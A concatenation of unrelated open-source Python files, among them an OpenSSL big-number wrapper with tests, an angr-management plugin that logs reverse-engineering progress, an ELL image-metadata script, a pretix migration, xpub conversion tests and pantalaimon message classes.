safe (int) -- 1 for a safe prime, otherwise 0.
"""
_check(0 < bits < 10000)
_check(safe in [0, 1])
ret = Bn()
_check(
_C.BN_generate_prime_ex(
ret.bn,
bits,
safe,
_FFI.NULL,
_FFI.NULL,
_FFI.NULL))
return ret
## -- methods
_upper_bound = 2**(64 - 1)
def __init__(self, num=0):
'Allocate a Big Number structure, initialized with a small integer or zero.'
self.bn = _C.BN_new()
if num == 0:
return
if __debug__:
_check(0 <= abs(num) <= self._upper_bound)
_check(isinstance(num, int))
# Assign
if num != 0:
ret = _C.BN_set_word(self.bn, abs(num))
if __debug__:
_check(ret)
if ret != 1:
raise Exception("Bn Exception.")
if num < 0:
self._set_neg(1)
def _set_neg(self, sign=1):
# """Sets the sign to "-" (1) or "+" (0)"""
if not (sign == 0 or sign == 1):
raise Exception("Sign has to be 0 or 1.")
_C.BN_set_negative(self.bn, sign)
def copy(self):
"""Returns a copy of the Bn object."""
return self.__copy__()
def __copy__(self):
# 'Copies the big number. Support for copy module'
other = Bn()
_C.BN_copy(other.bn, self.bn)
return other
def __deepcopy__(self, memento):
# 'Deepcopy is the same as copy'
# pylint: disable=unused-argument
return self.__copy__()
def __del__(self):
# 'Deallocate all resources of the big number'
self.__C.BN_clear_free(self.bn)
def __inner_cmp__(self, other):
# 'Irel comparison function'
# if __debug__:
# _check( type(other) == Bn )
try:
sig = int(_C.BN_cmp(self.bn, other.bn))
return sig
except AttributeError:
return self.__inner_cmp__(Bn.from_num(other))
def __lt__(self, other):
return self.__inner_cmp__(other) < 0
def __le__(self, other):
return self.__inner_cmp__(other) <= 0
def __eq__(self, other):
if isinstance(other, int):
other = Bn(other)
if not isinstance(other, Bn):
return False
return self.__inner_cmp__(other) == 0
def __ne__(self, other):
return self.__inner_cmp__(other) != 0
def __gt__(self, other):
return self.__inner_cmp__(other) > 0
def __ge__(self, other):
return self.__inner_cmp__(other) >= 0
def bool(self):
'Turn Bn into boolean. False if zero, True otherwise.'
return self.__bool__()
def __bool__(self):
# 'Turn into boolean'
return not (self == Bn(0))
# Python 2 compatibility
def __nonzero__(self):
return self.__bool__()
# Export in different representations
def repr(self):
'The representation of the number as a decimal string'
return self.__repr__()
def __repr__(self):
# 'The representation of the number as a decimal string'
buf = _C.BN_bn2dec(self.bn)
s = bytes(_FFI.string(buf))
_C.OPENSSL_free(buf)
return s.decode('utf8')
def int(self):
"""A native python integer representation of the Big Number.
Synonym for int(bn).
"""
return self.__int__()
def __int__(self):
return int(self.__repr__())
def __index__(self):
return int(self.__repr__())
def hex(self):
"""The representation of the string in hexadecimal.
Synonym for hex(n)."""
return self.__hex__()
def __hex__(self):
# """The representation of the string in hexadecimal"""
buf = _C.BN_bn2hex(self.bn)
s = bytes(_FFI.string(buf))
_C.OPENSSL_free(buf)
return s.decode("utf8")
def binary(self):
"""Returns a byte sequence storing the absolute value of the Big
Number in Big-Endian format (with 8 bit atoms). You need to extact the sign separately.
Example:
>>> bin = Bn(66051).binary()
>>> hexlify(bin) == b'010203'
True
"""
if self < 0:
raise Exception("Cannot represent negative numbers")
size = _C.bn_num_bytes(self.bn)
bin_string = _FFI.new("unsigned char[]", size)
l = _C.BN_bn2bin(self.bn, bin_string)
assert int(l) == size
return bytes(_FFI.buffer(bin_string)[:])
def random(self):
"""Returns a cryptographically strong random number 0 <= rnd < self.
Example:
>>> r = Bn(100).random()
>>> 0 <= r < 100
True
"""
rnd = Bn()
err = _C.BN_rand_range(rnd.bn, self.bn)
if __debug__:
_check(err)
return rnd
# ---------- Arithmetic --------------
def int_neg(self):
"""Returns the negative of this number. Synonym with -self.
Example:
>>> one100 = Bn(100)
>>> one100.int_neg()
-100
>>> -one100
-100
"""
return self.__neg__()
def int_add(self, other):
"""Returns the sum of this number with another. Synonym for self + other.
Example:
>>> one100 = Bn(100)
>>> two100 = Bn(200)
>>> two100.int_add(one100) # Function syntax
300
>>> two100 + one100 # Operator syntax
300
"""
return self.__add__(other)
def __radd__(self, other):
return self.__add__(other)
def __add__(self, other):
try:
r = Bn()
err = _C.BN_add(r.bn, self.bn, other.bn)
if __debug__:
_check(err)
return r
except AttributeError:
return self.__add__(Bn.from_num(other))
def int_sub(self, other):
"""Returns the difference between this number and another.
Synonym for self - other.
Example:
>>> one100 = Bn(100)
>>> two100 = Bn(200)
>>> two100.int_sub(one100) # Function syntax
100
>>> two100 - one100 # Operator syntax
100
"""
return self - other
def __rsub__(self, other):
return Bn(other) - self
def __sub__(self, other):
try:
r = Bn()
err = _C.BN_sub(r.bn, self.bn, other.bn)
if __debug__:
_check(err)
return r
except AttributeError:
return self.__sub__(Bn.from_num(other))
def int_mul(self, other):
"""Returns the product of this number with another.
Synonym for self * other.
Example:
>>> one100 = Bn(100)
>>> two100 = Bn(200)
>>> one100.int_mul(two100) # Function syntax
20000
>>> one100 * two100 # Operator syntax
20000
"""
return self.__mul__(other)
def __rmul__(self, other):
return self.__mul__(other)
def __mul__(self, other):
try:
r = Bn()
local_ctx = get_ctx()
err = _C.BN_mul(r.bn, self.bn, other.bn, local_ctx.bnctx)
if __debug__:
_check(err)
return r
except AttributeError:
other = Bn.from_num(other)
if other is NotImplemented:
return NotImplemented
return self.__mul__(other)
# ------------------ Mod arithmetic -------------------------
def mod_add(self, other, m):
"""
mod_add(other, m)
Returns the sum of self and other modulo m.
Example:
>>> Bn(10).mod_add(Bn(2), Bn(11)) # Only function notation available
1
"""
try:
r = Bn()
local_ctx = get_ctx()
err = _C.BN_mod_add(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)
if __debug__:
_check(err)
return r
except AttributeError:
return self.mod_add(Bn.from_num(other), Bn.from_num(m))
def mod_sub(self, other, m):
"""
mod_sub(other, m)
Returns the difference of self and other modulo m.
Example:
>>> Bn(10).mod_sub(Bn(2), Bn(11)) # Only function notation available
8
"""
try:
r = Bn()
local_ctx = get_ctx()
err = _C.BN_mod_sub(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)
if __debug__:
_check(err)
return r
except AttributeError:
return self.mod_sub(Bn.from_num(other), Bn.from_num(m))
def mod_mul(self, other, m):
"""
mod_mul(other, m)
Return the product of self and other modulo m.
Example:
>>> Bn(10).mod_mul(Bn(2), Bn(11)) # Only function notation available
9
"""
try:
r = Bn()
local_ctx = get_ctx()
err = _C.BN_mod_mul(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)
if __debug__:
_check(err)
return r
except AttributeError:
return self.mod_mul(Bn.from_num(other), Bn.from_num(m))
def mod_inverse(self, m):
"""
mod_inverse(m)
Compute the inverse mod m, such that self * res == 1 mod m.
Example:
>>> Bn(10).mod_inverse(m = Bn(11)) # Only function notation available
10
>>> Bn(10).mod_mul(Bn(10), m = Bn(11)) == Bn(1)
True
"""
try:
res = Bn()
local_ctx = get_ctx()
err = _C.BN_mod_inverse(res.bn, self.bn, m.bn, local_ctx.bnctx)
if err == _FFI.NULL:
errs = get_errors()
if errs == [50770023]:
raise Exception("No inverse")
elif errs == [50782316]:
raise Exception("No inverse")
else:
raise Exception("Unknown error: %s" % errs)
return res
except AttributeError:
return self.mod_inverse(Bn.from_num(m))
def mod_pow(self, other, m, ctx=None):
""" Performs the modular exponentiation of self ** other % m.
Example:
>>> one100 = Bn(100)
>>> one100.mod_pow(2, 3) # Modular exponentiation
1
"""
return self.__pow__(other, m, ctx=ctx)
def divmod(self, other):
"""Returns the integer division and remainder of this number by another.
Synonym for (div, mod) = divmod(self, other)"""
return self.__divmod__(other)
def __rdivmod__(self, other):
return Bn(other).__divmod__(self)
def __divmod__(self, other):
try:
dv = Bn()
rem = Bn()
local_ctx = get_ctx()
ret = _C.BN_div(dv.bn, rem.bn, self.bn, other.bn, local_ctx.bnctx)
if __debug__:
_check(ret)
return (dv, rem)
except AttributeError:
return self.__divmod__(Bn.from_num(other))
def int_div(self, other):
"""Returns the integer division of this number by another.
Synonym of self / other.
Example:
>>> one100 = Bn(100)
>>> two100 = Bn(200)
>>> two100.int_div(one100) # Function syntax
2
>>> two100 / one100 # Operator syntax
2
"""
return self.__div__(other)
def __rdiv__(self, other):
return Bn(other).__div__(self)
def __div__(self, other):
dv, _ = divmod(self, other)
return dv
def mod(self, other):
"""Returns the remainder of this number modulo another.
Synonym for self % other.
Example:
>>> one100 = Bn(100)
>>> two100 = Bn(200)
>>> two100.mod(one100) # Function syntax
0
>>> two100 % one100 # Operator syntax
0
"""
return self.__mod__(other)
def __rmod__(self, other):
return Bn(other).__mod__(self)
def __mod__(self, other):
try:
rem = Bn()
local_ctx = get_ctx()
err = _C.BN_nnmod(rem.bn, self.bn, other.bn, local_ctx.bnctx)
if __debug__:
_check(err)
return rem
except AttributeError:
self.__mod__(Bn.from_num(other))
def __rtruediv__(self, other):
return Bn(other).__truediv__(self)
def __truediv__(self, other):
return self.__div__(other)
def __rfloordiv__(self, other):
return Bn(other).__floordiv__(self)
def __floordiv__(self, other):
return self.__div__(other)
def __rpow__(self, other):
return Bn(other).__pow__(self)
def pow(self, other, modulo=None, ctx=None):
"""Returns the number raised to the power other optionally modulo a third number.
Synonym with pow(self, other, modulo).
Example:
>>> one100 = Bn(100)
>>> one100.pow(2) # Function syntax
10000
>>> one100 ** 2 # Operator syntax
10000
>>> one100.pow(2, 3) # Modular exponentiation
1
"""
if modulo:
return self.__pow__(other, modulo, ctx)
else:
return self ** other
def __pow__(self, other, modulo=None, ctx=None):
try:
res = Bn()
if ctx is None:
ctx = BnCtx()
if modulo is None:
_check(_C.BN_exp(res.bn, self.bn, other.bn, ctx.bnctx))
else:
_check(
_C.BN_mod_exp(
res.bn,
self.bn,
other.bn,
modulo.bn,
ctx.bnctx))
return res
except BaseException:
other = Bn.from_num(other)
if modulo is not None:
modulo = Bn.from_num(modulo)
return self.__pow__(other, modulo, ctx)
def is_prime(self):
"""Returns True if the number is prime, with negligible prob. of error."""
res = int(_C.BN_is_prime_ex(self.bn, 0, get_ctx().bnctx, _FFI.NULL))
if res == 0:
return False
if res == 1:
return True
raise Exception("Primality test failure %s" % int(res))
def is_odd(self):
"""Returns True if the number is odd."""
return bool(_C.bn_is_odd(self.bn))
def is_bit_set(self, n):
"""Returns True if the nth bit is set"""
return int(_C.BN_is_bit_set(self.bn, n))
def num_bits(self):
"""Returns the number of bits representing this Big Number"""
return int(_C.BN_num_bits(self.bn))
# Implement negative
def __neg__(self):
# pylint: disable=protected-access
zero = Bn(0)
ret = copy(self)
if ret >= zero:
ret._set_neg(1)
else:
ret._set_neg(0)
return ret
def __hash__(self):
return int(self).__hash__()
# Unsuported
# object.__lshift__(self, other)
# object.__rshift__(self, other)
# object.__and__(self, other)
# object.__xor__(self, other)
# object.__or__(self, other)
# ---------- Tests ------------
def test_bn_constructors():
assert Bn.from_decimal("100") == 100
assert Bn.from_decimal("-100") == -100
with pytest.raises(Exception) as excinfo:
Bn.from_decimal("100ABC")
assert 'BN Error' in str(excinfo.value)
with pytest.raises(Exception) as excinfo:
Bn.from_hex("100ABCZ")
assert 'BN Error' in str(excinfo.value)
assert Bn.from_hex(Bn(-100).hex()) == -100
assert Bn(15).hex() == Bn(15).hex()
with pytest.raises(Exception) as excinfo:
Bn(-100).binary()
assert 'negative' in str(excinfo.value)
#assert Bn.from_binary(Bn(-100).binary()) == 100
assert Bn.from_binary(Bn(100).binary()) == Bn(100)
assert Bn.from_binary(Bn(100).binary()) == 100
with pytest.raises(Exception) as excinfo:
s = 10**10
Bn(s)
assert 'does not fit' in str(excinfo.value)
with pytest.raises(Exception) as excinfo:
_check(False)
assert 'BN' in str(excinfo.value)
#assert Bn.from_binary(Bn(-100).binary()) != Bn(50)
assert int(Bn(-100)) == -100
assert repr(Bn(5)) == Bn(5).repr() == "5"
assert range(10)[Bn(4)] == 4
d = {Bn(5): 5, Bn(6): 6}
assert Bn(5) in d
def test_bn_prime():
p = Bn.get_prime(128)
assert p > Bn(0)
assert p.is_prime()
assert not Bn(16).is_prime()
assert p.num_bits() > 127
def test_bn_arithmetic():
assert (Bn(1) + Bn(1) == Bn(2))
assert (Bn(1).int_add(Bn(1)) == Bn(2))
assert (Bn(1) + 1 == Bn(2))
# assert (1 + Bn(1) == Bn(2))
assert (Bn(1) + Bn(-1) == Bn(0))
assert (Bn(10) + Bn(10) == Bn(20))
assert (Bn(-1) * Bn(-1) == Bn(1))
assert (Bn(-1).int_mul(Bn(-1)) == Bn(1))
assert (Bn(10) * Bn(10) == Bn(100))
assert (Bn(10) - Bn(10) == Bn(0))
assert (Bn(10) - Bn(100) == Bn(-90))
assert (Bn(10) + (-Bn(10)) == Bn(0))
s = -Bn(100)
assert (Bn(10) + s == Bn(-90))
assert (Bn(10) - (-Bn(10)) == Bn(20))
assert -Bn(-10) == 10
assert Bn(-10).int_neg() == 10
assert divmod(Bn(10), Bn(3)) == (Bn(3), Bn(1))
assert Bn(10).divmod(Bn(3)) == (Bn(3), Bn(1))
assert Bn(10) / Bn(3) == Bn(3)
assert Bn(10) // Bn(3) == Bn(3)
assert Bn(10).int_div(Bn(3)) == Bn(3)
assert Bn(10) % Bn(3) == Bn(1)
assert Bn(10).mod(Bn(3)) == Bn(1)
assert Bn(2) ** Bn(8) == Bn(2 ** 8)
assert pow(Bn(2), Bn(8), Bn(27)) == Bn(2 ** 8 % 27)
pow(Bn(10), Bn(10)).binary()
assert pow(Bn(2), 8, 27) == 2 ** 8 % 27
assert Bn(3).mod_inverse(16) == 11
with pytest.raises(Exception) as excinfo:
Bn(3).mod_inverse(0)
print("Got inverse")
assert 'No inverse' in str(excinfo.value)
with pytest.raises(Exception) as excinfo:
x = Bn(0).mod_inverse(Bn(13))
print("!!! Got inverse", x)
assert 'No inverse' in str(excinfo.value)
# with pytest.raises(Exception) as excinfo:
# x = Bn(0).mod_inverse(Bn(13))
# print("Got inverse", x)
#assert 'No inverse' in str(excinfo.value)
assert Bn(10).mod_add(10, 15) == (10 + 10) % 15
assert Bn(10).mod_sub(100, 15) == (10 - 100) % 15
assert Bn(10).mod_mul(10, 15) == (10 * 10) % 15
assert Bn(-1).bool()
def test_bn_right_arithmetic():
assert (1 + Bn(1) == Bn(2))
assert (-1 * Bn(-1) == Bn(1))
assert (10 * Bn(10) == Bn(100))
assert (10 - Bn(10) == Bn(0))
assert (10 - Bn(100) == Bn(-90))
assert (10 + (-Bn(10)) == Bn(0))
s = -Bn(100)
assert (10 + s == Bn(-90))
assert (10 - (-Bn(10)) == Bn(20))
assert divmod(10, Bn(3)) == (Bn(3), Bn(1))
assert 10 / Bn(3) == Bn(3)
assert 10 // Bn(3) == Bn(3)
assert 10 % Bn(3) == Bn(1)
assert 2 ** Bn(8) == Bn(2 ** 8)
assert 100 == Bn(100)
pow(10, Bn(10))
def test_bn_allocate():
# Test allocation
n0 = Bn(10)
assert True
assert str(Bn()) == "0"
assert str(Bn(1)) == "1"
assert str(Bn(-1)) == "-1"
assert Bn(15).hex() == "0F"
assert Bn(-15).hex() == "-0F"
assert int(Bn(5)) == 5
assert Bn(5).int() == 5
assert 0 <= Bn(15).random() < 15
# Test copy
o0 = copy(n0)
o1 = deepcopy(n0)
assert o0 == n0
assert o1 == n0
# Test nonzero
assert not Bn()
assert not Bn(0)
assert Bn(1)
assert Bn(100)
def test_bn_cmp():
assert Bn(1) < Bn(2)
assert Bn(1) <= Bn(2)
assert Bn(2) <= Bn(2)
assert Bn(2) == Bn(2)
assert not Bn(2) == None
assert Bn(2) <= Bn(3)
assert Bn(2) < Bn(3)
def test_extras():
two = Bn(2)
two2 = two.copy()
assert two == two2
def test_odd():
assert Bn(1).is_odd()
assert Bn(1).is_bit_set(0)
assert not Bn(1).is_bit_set(1)
assert Bn(3).is_odd()
assert Bn(3).is_bit_set(0)
assert Bn(3).is_bit_set(1)
assert not Bn(0).is_odd()
assert not Bn(2).is_odd()
assert Bn(100).is_bit_set(Bn(100).num_bits() - 1)
def test_check():
with pytest.raises(Exception) as excinfo:
_check(False)
assert 'BN' in str(excinfo.value)
with pytest.raises(Exception) as excinfo:
_check(-1)
assert 'BN' in str(excinfo.value)
with pytest.raises(Exception) as excinfo:
_check(0)
assert 'BN' in str(excinfo.value)
def test_timing_exp():
p = Bn.from_decimal("158261031819091141711717027498980088325079888681498417129323009913367867128038610210948802263526234270043507882496188624614467036250990588401775690578042934008692254417273606807265961724843618743242066301529332478013432957153823449143202719186309012133210922613102725038632605463022887306439116579645787938883")
psmall = Bn.from_decimal(
"90123082853250477832412338337738008391831682960497136029451532639902615425459")
xs = [p.random() for _ in range(1000)]
ys = [p.random() for _ in range(1000)]
import time
print
t0 = time.time()
X = [xi.mod_mul(yi, psmall) for (xi, yi) in zip(xs, ys)]
t1 = time.time()
print("Mod_mul time: %.2fms" % ((t1 - t0) * 1000.0 / 1000.0))
t0 = time.time()
X = [xi.pow(yi, p) for (xi, yi) in zip(xs, ys)]
t1 = time.time()
print(" Pow time: %.2fms" % ((t1 - t0) * 1000.0 / 1000.0))
ctx = BnCtx()
t0 = time.time()
X = [xi.pow(yi, p, ctx) for (xi, yi) in zip(xs, ys)]
t1 = time.time()
print("Pow ctx time: %.2fms" % ((t1 - t0) * 1000.0 / 1000.0))
|
angrmanagement/plugins/log_reverse_engineering/log_reverse_engineering_plugin.py | DennyDai/angr-management | 474 | 12653596 | <reponame>DennyDai/angr-management
from angrmanagement.config import Conf
from ..base_plugin import BasePlugin
try:
from slacrs import Slacrs
from slacrs.model import VariableRename, FunctionRename, ReverseEngineeringProgress
except ImportError as ex:
Slacrs = None # type: Optional[type]
VariableRename = None # type: Optional[type]
FunctionRename = None # type: Optional[type]
ReverseEngineeringProgress = None # type: Optional[type]
class LogReverseEngineeringPlugin(BasePlugin):
"""
Plugin for logging the reverse engineering of a program
"""
def __init__(self, workspace):
if not Slacrs:
raise Exception(
"Please install Slacrs to Initialize LogReverseEngineering Plugin"
)
super().__init__(workspace)
self.session = Slacrs(database=Conf.checrs_backend_str).session()
self.project = (
self.workspace.instance.img_name
if self.workspace.instance.img_name
else self.workspace.instance.project.filename
)
def handle_variable_rename(self, func, offset: int, old_name: str, new_name: str, type_: str, size: int):
"""
Logic to check if the same variable has already been renamed, if not add to the current session.
"""
if offset:
new_name = old_name
variable_rename = (
self.session.query(VariableRename)
.filter(
VariableRename.project == self.project,
VariableRename.function == func._name,
VariableRename.variable == old_name,
)
.first()
)
if variable_rename:
self.session.delete(variable_rename)
variable_rename = VariableRename()
variable_rename.project = self.project
variable_rename.function = func._name
variable_rename.variable = new_name
self.session.add(variable_rename)
#
def handle_function_rename(self, func, old_name: str, new_name: str):
"""
Logic to check if the same Function has already been renamed, if not add to the current session.
"""
function_rename = (
self.session.query(FunctionRename)
.filter(
FunctionRename.project == self.project,
FunctionRename.function == old_name,
)
.first()
)
if old_name.startswith("sub") or function_rename:
if function_rename:
self.session.delete(function_rename)
function_rename = FunctionRename()
function_rename.project = self.project
function_rename.function = new_name
self.update_function_name(old_name, new_name)
self.session.add(function_rename)
def handle_project_save(self, file_name: str):
"""
Commit the current session only when user saves the project, uncommitted session objects will be discarded
at teardown.
"""
variables_renamed_count = len(
self.session.query(VariableRename)
.filter(VariableRename.project == self.project)
.all()
)
total_variables_count = len(
self.workspace.instance.project.kb.variables.global_manager._variables
)
reverse_eng_progress = (
self.session.query(ReverseEngineeringProgress)
.filter(ReverseEngineeringProgress.project == self.project)
.first()
)
if not reverse_eng_progress:
reverse_eng_progress = ReverseEngineeringProgress()
self.session.add(reverse_eng_progress)
reverse_eng_progress.project = self.project
reverse_eng_progress.variables_renamed = variables_renamed_count
reverse_eng_progress.total_variables = total_variables_count
(
reverse_eng_progress.functions_renamed,
reverse_eng_progress.total_functions,
) = self.get_function_rename_stats()
self.session.commit()
def update_function_name(self, old_name, new_name):
"""
To update the function names for all variable_rename if function gets renamed.
"""
variables_renamed = self.session.query(VariableRename).filter(
VariableRename.project == self.project, VariableRename.function == old_name
)
for obj in variables_renamed:
obj.function = new_name
def get_function_rename_stats(self):
functions_renamed = [
func.function
for func in self.session.query(FunctionRename)
.filter(FunctionRename.project == self.project)
.all()
]
functions_renamed_count = 0
total_functions_count = 0
for key in self.workspace.instance.project.kb.functions._function_map:
if (
self.workspace.instance.project.kb.functions._function_map[key]._name
in functions_renamed
):
functions_renamed_count = functions_renamed_count + 1
total_functions_count = total_functions_count + 1
elif self.workspace.instance.project.kb.functions._function_map[
key
]._name.startswith("sub"):
total_functions_count = total_functions_count + 1
return [functions_renamed_count, total_functions_count]
def teardown(self):
self.session.close()
|
tools/utilities/pythonlibs/vision/add_image_preprocessing_metadata.py | awf/ELL | 2,094 | 12653598 | <reponame>awf/ELL<gh_stars>1000+
#!/usr/bin/env python3
###################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: add_image_preprocessing_metadata.py
# Authors: <NAME>
#
# Requires: Python 3.x
#
###################################################################################################
import argparse
import add_input_metadata
image_preprocessing_key_prefix = "model.input"
expected_color_channel_order_key = "{}.expectedColorChannelOrder".format(image_preprocessing_key_prefix)
expected_pixel_range_low_key = "{}.expectedPixelRangeLow".format(image_preprocessing_key_prefix)
expected_pixel_range_high_key = "{}.expectedPixelRangeHigh".format(image_preprocessing_key_prefix)
red_channel_mean_key = "{}.redChannelMean".format(image_preprocessing_key_prefix)
green_channel_mean_key = "{}.greenChannelMean".format(image_preprocessing_key_prefix)
blue_channel_mean_key = "{}.blueChannelMean".format(image_preprocessing_key_prefix)
red_channel_std_dev_key = "{}.redChannelStdDev".format(image_preprocessing_key_prefix)
green_channel_std_dev_key = "{}.greenChannelStdDev".format(image_preprocessing_key_prefix)
blue_channel_std_dev_key = "{}.blueChannelStdDev".format(image_preprocessing_key_prefix)
pytorch_imagenet_normalization_defaults = {
expected_color_channel_order_key: "rgb",
expected_pixel_range_low_key: 0.0,
expected_pixel_range_high_key: 1.0,
red_channel_mean_key: 0.485,
green_channel_mean_key: 0.456,
blue_channel_mean_key: 0.406,
red_channel_std_dev_key: 0.229,
green_channel_std_dev_key: 0.224,
blue_channel_std_dev_key: 0.225
}
def add_image_preprocessing_metadata(model_path,
color_order_str,
scale_pixel_range,
channel_means,
channel_std_dev,
starting_defaults={}):
metadata_dict = starting_defaults
if color_order_str:
metadata_dict[expected_color_channel_order_key] = color_order_str
if scale_pixel_range:
metadata_dict[expected_pixel_range_low_key] = scale_pixel_range[0]
metadata_dict[expected_pixel_range_high_key] = scale_pixel_range[1]
# Check if both low and high range keys are in or not in the dictionary
# Check this outside the `if args.scale_pixel_range:` block to handle default cases as well
if (expected_pixel_range_low_key in metadata_dict) != (expected_pixel_range_high_key in metadata_dict):
raise Exception("Either both or neither of low and high pixel ranges must be specified")
# Assign means and standard deviations in the same order as color_order_str
color_tag_to_mean_keys = {
"r": red_channel_mean_key,
"g": green_channel_mean_key,
"b": blue_channel_mean_key
}
color_tag_to_std_dev_keys = {
"r": red_channel_std_dev_key,
"g": green_channel_std_dev_key,
"b": blue_channel_std_dev_key
}
if color_order_str:
color_order = list(color_order_str)
for channel_idx in range(len(color_order)):
color_tag = color_order[channel_idx]
if channel_means:
metadata_dict[color_tag_to_mean_keys[color_tag]] = channel_means[channel_idx]
if channel_std_dev:
metadata_dict[color_tag_to_std_dev_keys[color_tag]] = channel_std_dev[channel_idx]
else:
if channel_means is not None:
print("Channel means ignored because color order was not specified")
if channel_std_dev is not None:
print("Channel std dev ignored because color order was not specified")
add_input_metadata.add_input_metadata(model_path, metadata_dict)
if __name__ == "__main__":
parser = argparse.ArgumentParser("Add an image preprocessing metadata tag to the input node of the given model")
parser.add_argument("model", help="The *.ell model to edit")
parser.add_argument("--order", help="The order of color channels the model requires", choices=["rgb", "bgr"])
parser.add_argument("--scale_pixel_range", help="The range to scale pixel values to", nargs=2, type=float,
metavar=("LOW", "HIGH"))
parser.add_argument("--mean", help="The per-channel mean values to subtract from pixel values after scaling",
nargs=3, type=float)
parser.add_argument("--stddev", help="The per-channel standard-deviation of values to divide each channel by "
"after scaling and mean subtraction", nargs=3, type=float)
parser.add_argument("--pytorch_imagenet_normalization", help="Use the defaults for Imagenet normalization with "
"Pytorch ordering, overridden with any other arguments also specified", action="store_true")
args = parser.parse_args()
starting_defaults = {}
if args.pytorch_imagenet_normalization:
starting_defaults = pytorch_imagenet_normalization_defaults
add_image_preprocessing_metadata(args.model,
args.order,
args.scale_pixel_range,
args.mean,
args.stddev,
starting_defaults)
|
src/pretix/base/migrations/0058_auto_20170429_1020.py | pajowu/pretix | 1,248 | 12653623 | <filename>src/pretix/base/migrations/0058_auto_20170429_1020.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-04-29 10:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0052_team_teaminvite'),
]
operations = [
migrations.RemoveField(
model_name='eventpermission',
name='event',
),
migrations.RemoveField(
model_name='eventpermission',
name='user',
),
migrations.RemoveField(
model_name='organizerpermission',
name='organizer',
),
migrations.RemoveField(
model_name='organizerpermission',
name='user',
),
migrations.RemoveField(
model_name='event',
name='permitted',
),
migrations.RemoveField(
model_name='organizer',
name='permitted',
),
migrations.AlterField(
model_name='team',
name='can_change_teams',
field=models.BooleanField(default=False, verbose_name='Can change teams and permissions'),
),
migrations.AlterField(
model_name='team',
name='limit_events',
field=models.ManyToManyField(blank=True, to='pretixbase.Event', verbose_name='Limit to events'),
),
migrations.DeleteModel(
name='EventPermission',
),
migrations.DeleteModel(
name='OrganizerPermission',
),
]
|
tests/test_util_xpub.py | rafa1239/specter-desktop | 683 | 12653631 | <gh_stars>100-1000
import pytest
from cryptoadvance.specter.util.xpub import (
convert_xpub_prefix,
get_xpub_fingerprint,
)
### Tests for xpub
def test_convert_to_ypub(ghost_machine_xpub_49, ghost_machine_ypub):
new_prefix = b"\x04\x9d\x7c\xb2"
assert convert_xpub_prefix(ghost_machine_xpub_49, new_prefix) == ghost_machine_ypub
def test_convert_to_zpub(ghost_machine_xpub_84, ghost_machine_zpub):
new_prefix = b"\x04\xb2\x47\x46"
assert convert_xpub_prefix(ghost_machine_xpub_84, new_prefix) == ghost_machine_zpub
def test_convert_ypub_back(ghost_machine_ypub, ghost_machine_xpub_49):
new_prefix = b"\x04\x88\xb2\x1e"
assert convert_xpub_prefix(ghost_machine_ypub, new_prefix) == ghost_machine_xpub_49
def test_convert_zpub_back(ghost_machine_zpub, ghost_machine_xpub_84):
new_prefix = b"\x04\x88\xb2\x1e"
assert convert_xpub_prefix(ghost_machine_zpub, new_prefix) == ghost_machine_xpub_84
def test_convert_to_upub(ghost_machine_tpub_49, ghost_machine_upub):
new_prefix = b"\x04\x4a\x52\x62"
assert convert_xpub_prefix(ghost_machine_tpub_49, new_prefix) == ghost_machine_upub
def test_convert_to_vpub(ghost_machine_tpub_84, ghost_machine_vpub):
new_prefix = b"\x04\x5f\x1c\xf6"
assert convert_xpub_prefix(ghost_machine_tpub_84, new_prefix) == ghost_machine_vpub
def test_get_xpub_fingerprint(ghost_machine_xpub_44):
# fingerprint from https://jlopp.github.io/xpub-converter/
assert get_xpub_fingerprint(ghost_machine_xpub_44).hex() == "81f802e3"
|
tests/local/test_PacerNotificationEmailTest.py | mmantel/juriscraper | 228 | 12653640 | <filename>tests/local/test_PacerNotificationEmailTest.py
import os
from juriscraper.pacer.email import NotificationEmail, S3NotificationEmail
from tests import TESTS_ROOT_EXAMPLES_PACER
from tests.local.PacerParseTestCase import PacerParseTestCase
TESTS_ROOT_EXAMPLES_PACER_NEF = os.path.join(TESTS_ROOT_EXAMPLES_PACER, "nef")
TESTS_ROOT_EXAMPLES_PACER_NEF_S3 = os.path.join(
TESTS_ROOT_EXAMPLES_PACER, "nef/s3"
)
class PacerNotificationEmailTest(PacerParseTestCase):
def setUp(self):
self.maxDiff = 200000
def test_notification_emails(self):
self.parse_files(
TESTS_ROOT_EXAMPLES_PACER_NEF, "*.html", NotificationEmail
)
class S3PacerNotificationEmailTest(PacerParseTestCase):
def setUp(self):
self.maxDiff = 200000
def test_notification_emails_s3(self):
self.parse_files(
TESTS_ROOT_EXAMPLES_PACER_NEF_S3, "*.txt", S3NotificationEmail
)
|
pantalaimon/thread_messages.py | arthurlutz/pantalaimon | 216 | 12653655 | <reponame>arthurlutz/pantalaimon
# Copyright 2019 The Matrix.org Foundation CIC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import attr
@attr.s
class Message:
pass
@attr.s
class UnverifiedDevicesSignal(Message):
pan_user = attr.ib()
room_id = attr.ib()
room_display_name = attr.ib()
@attr.s
class UnverifiedResponse(Message):
message_id = attr.ib()
pan_user = attr.ib()
room_id = attr.ib()
@attr.s
class SendAnywaysMessage(UnverifiedResponse):
pass
@attr.s
class CancelSendingMessage(UnverifiedResponse):
pass
@attr.s
class KeyRequestMessage(Message):
pan_user = attr.ib(type=str)
event = attr.ib()
@attr.s
class _KeyShare(Message):
message_id = attr.ib()
pan_user = attr.ib()
user_id = attr.ib()
device_id = attr.ib()
@attr.s
class ContinueKeyShare(_KeyShare):
pass
@attr.s
class CancelKeyShare(_KeyShare):
pass
@attr.s
class DaemonResponse(Message):
message_id = attr.ib()
pan_user = attr.ib()
code = attr.ib()
message = attr.ib()
@attr.s
class UpdateUsersMessage(Message):
server = attr.ib()
user_id = attr.ib()
device_id = attr.ib()
@attr.s
class UpdateDevicesMessage(Message):
pan_user = attr.ib(type=str)
devices = attr.ib(type=dict)
@attr.s
class _KeysOperation(Message):
